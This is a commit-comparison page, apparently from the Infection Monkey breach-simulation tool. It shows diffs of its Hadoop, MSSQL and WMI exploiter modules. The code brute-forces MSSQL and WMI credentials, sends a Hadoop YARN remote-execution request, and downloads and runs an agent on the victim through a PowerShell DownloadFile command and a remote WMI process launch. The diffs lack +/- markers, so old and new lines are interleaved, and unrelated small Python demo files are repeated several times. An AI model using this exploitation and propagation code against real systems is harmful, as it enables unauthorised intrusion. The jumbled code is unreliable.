Compare commits

..

4 Commits

Author SHA1 Message Date
Ilija Lazoroski d1427117c7 Agent: Add successful exploitation in WMI 2022-10-07 14:58:32 +02:00
Ilija Lazoroski 6950dcdf0c Agent: Change propagation timestamp in WMI 2022-10-07 14:49:49 +02:00
Ilija Lazoroski c09c2c2127 Agent: Add attack technique tags from WMIExploiter 2022-10-07 14:12:52 +02:00
Ilija Lazoroski ed191bcf61 Agent: Publish events from WMI 2022-10-07 13:55:49 +02:00
13 changed files with 435 additions and 726 deletions

View File

@ -1,13 +0,0 @@
import json
data = {
'name' : 'myname',
'age' : 100,
}
# separators:是分隔符的意思参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符后面的空格都除去了.
# dumps 将python对象字典转换为json字符串
json_str = json.dumps(data, separators=(',', ':'))
print(type(json_str), json_str)
# loads 将json字符串转化为python对象字典
pyton_obj = json.loads(json_str)
print(type(pyton_obj), pyton_obj)

View File

@ -5,20 +5,13 @@
""" """
import json import json
import logging
import posixpath import posixpath
import random import random
import string import string
from time import time
import requests import requests
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.tags import (
T1105_ATTACK_TECHNIQUE_TAG,
T1203_ATTACK_TECHNIQUE_TAG,
T1210_ATTACK_TECHNIQUE_TAG,
)
from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
@ -30,10 +23,6 @@ from infection_monkey.model import (
) )
from infection_monkey.utils.commands import build_monkey_commandline from infection_monkey.utils.commands import build_monkey_commandline
logger = logging.getLogger(__name__)
HADOOP_EXPLOITER_TAG = "hadoop-exploiter"
class HadoopExploiter(WebRCE): class HadoopExploiter(WebRCE):
_EXPLOITED_SERVICE = "Hadoop" _EXPLOITED_SERVICE = "Hadoop"
@ -43,43 +32,39 @@ class HadoopExploiter(WebRCE):
# Random string's length that's used for creating unique app name # Random string's length that's used for creating unique app name
RAN_STR_LEN = 6 RAN_STR_LEN = 6
_EXPLOITER_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
_PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
def __init__(self): def __init__(self):
super(HadoopExploiter, self).__init__() super(HadoopExploiter, self).__init__()
def _exploit_host(self): def _exploit_host(self):
# Try to get potential urls # Try to get exploitable url
potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
if not potential_urls: self.add_vulnerable_urls(urls, True)
self.exploit_result.error_message = ( if not self.vulnerable_urls:
f"No potential exploitable urls has been found for {self.host}"
)
return self.exploit_result return self.exploit_result
try:
monkey_path_on_victim = get_agent_dst_path(self.host) monkey_path_on_victim = get_agent_dst_path(self.host)
except KeyError:
return self.exploit_result
http_path, http_thread = HTTPTools.create_locked_transfer( http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, str(monkey_path_on_victim), self.agent_binary_repository self.host, str(monkey_path_on_victim), self.agent_binary_repository
) )
command = self._build_command(monkey_path_on_victim, http_path)
try: try:
for url in potential_urls: command = self._build_command(monkey_path_on_victim, http_path)
if self.exploit(url, command):
if self.exploit(self.vulnerable_urls[0], command):
self.add_executed_cmd(command) self.add_executed_cmd(command)
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
break
finally: finally:
http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop() http_thread.stop()
return self.exploit_result return self.exploit_result
def exploit(self, url: str, command: str): def exploit(self, url, command):
if self._is_interrupted(): if self._is_interrupted():
self._set_interrupted() self._set_interrupted()
return False return False
@ -88,8 +73,8 @@ class HadoopExploiter(WebRCE):
resp = requests.post( resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
) )
resp_dict = json.loads(resp.content) resp = json.loads(resp.content)
app_id = resp_dict["application-id"] app_id = resp["application-id"]
# Create a random name for our application in YARN # Create a random name for our application in YARN
# random.SystemRandom can block indefinitely in Linux # random.SystemRandom can block indefinitely in Linux
@ -102,16 +87,10 @@ class HadoopExploiter(WebRCE):
self._set_interrupted() self._set_interrupted()
return False return False
timestamp = time()
resp = requests.post( resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
) )
return resp.status_code == 202
success = resp.status_code == 202
message = "" if success else f"Failed to exploit via {url}"
self._publish_exploitation_event(timestamp, success, error_message=message)
self._publish_propagation_event(timestamp, success, error_message=message)
return success
def check_if_exploitable(self, url): def check_if_exploitable(self, url):
try: try:

View File

@ -1,18 +1,12 @@
import logging import logging
from pathlib import PureWindowsPath from pathlib import PureWindowsPath
from time import sleep, time from time import sleep
from typing import Iterable, Optional, Tuple from typing import Sequence, Tuple
import pymssql import pymssql
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.credentials import get_plaintext from common.credentials import get_plaintext
from common.tags import (
T1059_ATTACK_TECHNIQUE_TAG,
T1105_ATTACK_TECHNIQUE_TAG,
T1110_ATTACK_TECHNIQUE_TAG,
T1210_ATTACK_TECHNIQUE_TAG,
)
from common.utils.exceptions import FailedExploitationError from common.utils.exceptions import FailedExploitationError
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.helpers import get_agent_dst_path
@ -26,8 +20,6 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
MSSQL_EXPLOITER_TAG = "mssql-exploiter"
class MSSQLExploiter(HostExploiter): class MSSQLExploiter(HostExploiter):
_EXPLOITED_SERVICE = "MSSQL" _EXPLOITED_SERVICE = "MSSQL"
@ -44,20 +36,13 @@ class MSSQLExploiter(HostExploiter):
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
) )
_EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
_PROPAGATION_TAGS = (
MSSQL_EXPLOITER_TAG,
T1059_ATTACK_TECHNIQUE_TAG,
T1105_ATTACK_TECHNIQUE_TAG,
)
def __init__(self): def __init__(self):
super().__init__() super().__init__()
self.cursor = None self.cursor = None
self.agent_http_path = None self.agent_http_path = None
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
agent_path_on_victim = PureWindowsPath(get_agent_dst_path(self.host)) agent_path_on_victim = get_agent_dst_path(self.host)
# Brute force to get connection # Brute force to get connection
creds = generate_identity_secret_pairs( creds = generate_identity_secret_pairs(
@ -67,18 +52,16 @@ class MSSQLExploiter(HostExploiter):
try: try:
self.cursor = self._brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds) self.cursor = self._brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds)
except FailedExploitationError: except FailedExploitationError:
error_message = ( logger.info(
f"Failed brute-forcing of MSSQL server on {self.host}," f"Failed brute-forcing of MSSQL server on {self.host},"
f" no credentials were successful" f" no credentials were successful"
) )
logger.error(error_message)
return self.exploit_result return self.exploit_result
if self._is_interrupted(): if self._is_interrupted():
self._set_interrupted() self._set_interrupted()
return self.exploit_result return self.exploit_result
timestamp = time()
try: try:
self._upload_agent(agent_path_on_victim) self._upload_agent(agent_path_on_victim)
self._run_agent(agent_path_on_victim) self._run_agent(agent_path_on_victim)
@ -89,17 +72,15 @@ class MSSQLExploiter(HostExploiter):
) )
logger.error(error_message) logger.error(error_message)
self._publish_propagation_event(timestamp, False, error_message=error_message)
self.exploit_result.error_message = error_message self.exploit_result.error_message = error_message
return self.exploit_result return self.exploit_result
self._publish_propagation_event(timestamp, True)
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
return self.exploit_result return self.exploit_result
def _brute_force( def _brute_force(
self, host: str, port: str, users_passwords_pairs_list: Iterable[Tuple[str, str]] self, host: str, port: str, users_passwords_pairs_list: Sequence[Tuple[str, str]]
) -> pymssql.Cursor: ) -> pymssql.Cursor:
""" """
Starts the brute force connection attempts and if needed then init the payload process. Starts the brute force connection attempts and if needed then init the payload process.
@ -125,7 +106,6 @@ class MSSQLExploiter(HostExploiter):
) )
for user, password in credentials_iterator: for user, password in credentials_iterator:
timestamp = time()
try: try:
# Core steps # Core steps
# Trying to connect # Trying to connect
@ -142,14 +122,14 @@ class MSSQLExploiter(HostExploiter):
) )
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self._report_login_attempt(timestamp, True, user, password) self.report_login_attempt(True, user, password)
cursor = conn.cursor() cursor = conn.cursor()
return cursor return cursor
except pymssql.OperationalError as err: except pymssql.OperationalError as err:
error_message = f"Connection to MSSQL failed: {err}" logger.info(f"Connection to MSSQL failed: {err}")
logger.info(error_message) self.report_login_attempt(False, user, password)
self._report_login_attempt(timestamp, False, user, password, error_message) # Combo didn't work, hopping to the next one
pass
logger.warning( logger.warning(
"No user/password combo was able to connect to host: {0}:{1}, " "No user/password combo was able to connect to host: {0}:{1}, "
@ -159,23 +139,14 @@ class MSSQLExploiter(HostExploiter):
"Bruteforce process failed on host: {0}".format(self.host.ip_addr) "Bruteforce process failed on host: {0}".format(self.host.ip_addr)
) )
def _report_login_attempt(
self, timestamp: float, success: bool, user, password: str, message: str = ""
):
self._publish_exploitation_event(timestamp, success, error_message=message)
self.report_login_attempt(success, user, password)
def _upload_agent(self, agent_path_on_victim: PureWindowsPath): def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
http_thread = self._start_agent_server(agent_path_on_victim) http_thread = self._start_agent_server(agent_path_on_victim)
self._run_agent_download_command(agent_path_on_victim) self._run_agent_download_command(agent_path_on_victim)
if http_thread:
MSSQLExploiter._stop_agent_server(http_thread) MSSQLExploiter._stop_agent_server(http_thread)
def _start_agent_server( def _start_agent_server(self, agent_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
self, agent_path_on_victim: PureWindowsPath
) -> Optional[LockedHTTPServer]:
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, str(agent_path_on_victim), self.agent_binary_repository self.host, str(agent_path_on_victim), self.agent_binary_repository
) )
@ -208,7 +179,7 @@ class MSSQLExploiter(HostExploiter):
def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str: def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str:
agent_args = build_monkey_commandline( agent_args = build_monkey_commandline(
self.servers, self.current_depth + 1, str(agent_path_on_victim) self.servers, self.current_depth + 1, agent_path_on_victim
) )
return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}" return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"

View File

@ -3,7 +3,6 @@ import urllib.error
import urllib.parse import urllib.parse
import urllib.request import urllib.request
from threading import Lock from threading import Lock
from typing import Optional, Tuple
from infection_monkey.network.firewall import app as firewall from infection_monkey.network.firewall import app as firewall
from infection_monkey.network.info import get_free_tcp_port from infection_monkey.network.info import get_free_tcp_port
@ -29,7 +28,7 @@ class HTTPTools(object):
@staticmethod @staticmethod
def create_locked_transfer( def create_locked_transfer(
host, dropper_target_path, agent_binary_repository, local_ip=None, local_port=None host, dropper_target_path, agent_binary_repository, local_ip=None, local_port=None
) -> Tuple[Optional[str], Optional[LockedHTTPServer]]: ) -> LockedHTTPServer:
""" """
Create http server for file transfer with a lock Create http server for file transfer with a lock
:param host: Variable with target's information :param host: Variable with target's information

View File

@ -2,10 +2,16 @@ import logging
import ntpath import ntpath
import socket import socket
import traceback import traceback
from time import time
from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.rpcrt import DCERPCException
from common.credentials import get_plaintext from common.credentials import get_plaintext
from common.tags import (
T1021_ATTACK_TECHNIQUE_TAG,
T1105_ATTACK_TECHNIQUE_TAG,
T1110_ATTACK_TECHNIQUE_TAG,
)
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.exploit.tools.smb_tools import SmbTools
@ -21,10 +27,15 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
WMI_EXPLOITER_TAG = "wmi-exploiter"
class WmiExploiter(HostExploiter): class WmiExploiter(HostExploiter):
_EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)" _EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"
_EXPLOITER_TAGS = (WMI_EXPLOITER_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG)
_PROPAGATION_TAGS = (WMI_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
@WmiTools.impacket_user @WmiTools.impacket_user
@WmiTools.dcom_wrap @WmiTools.dcom_wrap
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
@ -44,6 +55,7 @@ class WmiExploiter(HostExploiter):
wmi_connection = WmiTools.WmiConnection() wmi_connection = WmiTools.WmiConnection()
timestamp = time()
try: try:
wmi_connection.connect( wmi_connection.connect(
self.host, self.host,
@ -55,26 +67,34 @@ class WmiExploiter(HostExploiter):
) )
except AccessDeniedException: except AccessDeniedException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug(f"Failed connecting to {self.host} using WMI") error_message = f"Failed connecting to {self.host} using WMI"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
continue continue
except DCERPCException: except DCERPCException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug(f"Failed connecting to {self.host} using WMI") logger.debug(f"Failed connecting to {self.host} using WMI")
self._publish_exploitation_event(timestamp, False, error_message=error_message)
continue continue
except socket.error: except socket.error:
logger.debug(f"Network error in WMI connection to {self.host}") error_message = f"Network error in WMI connection to {self.host}"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return self.exploit_result return self.exploit_result
except Exception as exc: except Exception as exc:
logger.debug( error_message = (
f"Unknown WMI connection error to {self.host}: " f"Unknown WMI connection error to {self.host}: "
f"{exc} {traceback.format_exc()}" f"{exc} {traceback.format_exc()}"
) )
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return self.exploit_result return self.exploit_result
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
self._publish_exploitation_event(timestamp, True, error_message=error_message)
downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"]) downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
@ -84,6 +104,7 @@ class WmiExploiter(HostExploiter):
target_path = get_agent_dst_path(self.host) target_path = get_agent_dst_path(self.host)
propagation_timestamp = time()
remote_full_path = SmbTools.copy_file( remote_full_path = SmbTools.copy_file(
self.host, self.host,
downloaded_agent, downloaded_agent,
@ -119,27 +140,23 @@ class WmiExploiter(HostExploiter):
if (0 != result.ProcessId) and (not result.ReturnValue): if (0 != result.ProcessId) and (not result.ReturnValue):
logger.info( logger.info(
"Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)", f"Executed dropper '{remote_full_path}' on remote victim {self.host} "
remote_full_path, f"(pid={result.ProcessId}, cmdline={cmdline})"
self.host,
result.ProcessId,
cmdline,
) )
self.add_vuln_port(port="unknown") self.add_vuln_port(port="unknown")
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
self._publish_propagation_event(propagation_timestamp, True)
else: else:
error_message = ( error_message = (
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, " f"Error executing dropper '{remote_full_path}' on remote victim {self.host} "
"cmdline=%r)", f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})"
remote_full_path,
self.host,
result.ProcessId,
result.ReturnValue,
cmdline,
) )
logger.debug(error_message) logger.debug(error_message)
self.exploit_result.error_message = error_message self.exploit_result.error_message = error_message
self._publish_propagation_event(
propagation_timestamp, False, error_message=error_message
)
result.RemRelease() result.RemRelease()
wmi_connection.close() wmi_connection.close()

View File

@ -4,7 +4,7 @@ from typing import Union
from typing_extensions import TypeAlias from typing_extensions import TypeAlias
from common.agent_events import PingScanEvent, TCPScanEvent from common.agent_events import AbstractAgentEvent, PingScanEvent, TCPScanEvent
from common.types import PortStatus, SocketAddress from common.types import PortStatus, SocketAddress
from monkey_island.cc.models import CommunicationType, Machine, Node from monkey_island.cc.models import CommunicationType, Machine, Node
from monkey_island.cc.repository import ( from monkey_island.cc.repository import (
@ -63,6 +63,10 @@ class ScanEventHandler:
except (RetrievalError, StorageError, UnknownRecordError): except (RetrievalError, StorageError, UnknownRecordError):
logger.exception("Unable to process tcp scan data") logger.exception("Unable to process tcp scan data")
def _get_source_node(self, event: AbstractAgentEvent) -> Node:
machine = self._get_source_machine(event)
return self._node_repository.get_node_by_machine_id(machine.id)
def _get_target_machine(self, event: ScanEvent) -> Machine: def _get_target_machine(self, event: ScanEvent) -> Machine:
try: try:
target_machines = self._machine_repository.get_machines_by_ip(event.target) target_machines = self._machine_repository.get_machines_by_ip(event.target)
@ -75,14 +79,6 @@ class ScanEventHandler:
self._machine_repository.upsert_machine(machine) self._machine_repository.upsert_machine(machine)
return machine return machine
def _get_source_node(self, event: ScanEvent) -> Node:
machine = self._get_source_machine(event)
return self._node_repository.get_node_by_machine_id(machine.id)
def _get_source_machine(self, event: ScanEvent) -> Machine:
agent = self._agent_repository.get_agent_by_id(event.source)
return self._machine_repository.get_machine_by_id(agent.machine_id)
def _update_target_machine_os(self, machine: Machine, event: PingScanEvent): def _update_target_machine_os(self, machine: Machine, event: PingScanEvent):
if event.os is not None and machine.operating_system is None: if event.os is not None and machine.operating_system is None:
machine.operating_system = event.os machine.operating_system = event.os
@ -104,5 +100,9 @@ class ScanEventHandler:
if tcp_connections: if tcp_connections:
self._node_repository.upsert_tcp_connections( self._node_repository.upsert_tcp_connections(
src_node.machine_id, {target_machine.id: tuple(tcp_connections)} src_node.machine_id, {target_machine.id: tcp_connections}
) )
def _get_source_machine(self, event: ScanEvent) -> Machine:
agent = self._agent_repository.get_agent_by_id(event.source)
return self._machine_repository.get_machine_by_id(agent.machine_id)

File diff suppressed because it is too large Load Diff

View File

@ -77,7 +77,7 @@
"classnames": "^2.3.1", "classnames": "^2.3.1",
"core-js": "^3.18.2", "core-js": "^3.18.2",
"crypto-js": "^4.1.1", "crypto-js": "^4.1.1",
"d3": "^7.6.1", "d3": "^5.14.1",
"downloadjs": "^1.4.7", "downloadjs": "^1.4.7",
"fetch": "^1.1.0", "fetch": "^1.1.0",
"file-saver": "^2.0.5", "file-saver": "^2.0.5",

View File

@ -1,13 +0,0 @@
import json
data = {
'name' : 'myname',
'age' : 100,
}
# separators:是分隔符的意思参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符后面的空格都除去了.
# dumps 将python对象字典转换为json字符串
json_str = json.dumps(data, separators=(',', ':'))
print(type(json_str), json_str)
# loads 将json字符串转化为python对象字典
pyton_obj = json.loads(json_str)
print(type(pyton_obj), pyton_obj)

View File

@ -1,13 +0,0 @@
import json
data = {
'name' : 'myname',
'age' : 100,
}
# separators:是分隔符的意思参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符后面的空格都除去了.
# dumps 将python对象字典转换为json字符串
json_str = json.dumps(data, separators=(',', ':'))
print(type(json_str), json_str)
# loads 将json字符串转化为python对象字典
pyton_obj = json.loads(json_str)
print(type(pyton_obj), pyton_obj)

View File

@ -1,21 +0,0 @@
import unittest
from mock import Mock
def VerifyPhone():
'''
校验用户手机号
'''
pass
class TestVerifyPhone(unittest.TestCase):
def test_verify_phone(self):
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
VerifyPhone = Mock(return_value=data)
self.assertEqual("success", VerifyPhone()["msg"]["result"])
print('测试用例')
if __name__ == '__main__':
unittest.main(verbosity=2)

View File

@ -1,21 +0,0 @@
import unittest
from mock import Mock
def VerifyPhone():
'''
校验用户手机号
'''
pass
class TestVerifyPhone(unittest.TestCase):
def test_verify_phone(self):
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
VerifyPhone = Mock(return_value=data)
self.assertEqual("success", VerifyPhone()["msg"]["result"])
print('测试用例')
if __name__ == '__main__':
unittest.main(verbosity=2)

View File

@ -1,21 +0,0 @@
import unittest
from mock import Mock
def VerifyPhone():
'''
校验用户手机号
'''
pass
class TestVerifyPhone(unittest.TestCase):
def test_verify_phone(self):
data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
VerifyPhone = Mock(return_value=data)
self.assertEqual("success", VerifyPhone()["msg"]["result"])
print('测试用例')
if __name__ == '__main__':
unittest.main(verbosity=2)